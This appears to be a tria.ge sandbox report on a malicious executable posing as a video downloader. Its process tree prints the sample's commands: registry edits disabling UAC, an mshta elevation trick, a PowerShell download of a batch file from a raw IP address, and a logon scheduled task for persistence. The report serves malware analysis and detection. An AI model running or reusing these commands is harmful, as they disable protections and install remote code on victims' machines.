Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
12/06/2024, 11:23 UTC
General
-
Target
pornhub_downloader.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Score
10/10
Malware Config
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Powershell Invoke Web Request.
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 35 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2175.tmp\2176.tmp\2177.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\229E.tmp\229F.tmp\22A0.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Creates scheduled task(s)
-
-
-
-
-
Network
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A -
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
-
DNSwww.pornhub.comRemote address:8.8.8.8:53Requestwww.pornhub.comIN A
No results found
-
8.8.8.8:53www.pornhub.comdns
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
-
8.8.8.8:53www.pornhub.comdns
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
-
8.8.8.8:53www.pornhub.comdns
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
DNS Request
www.pornhub.com
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f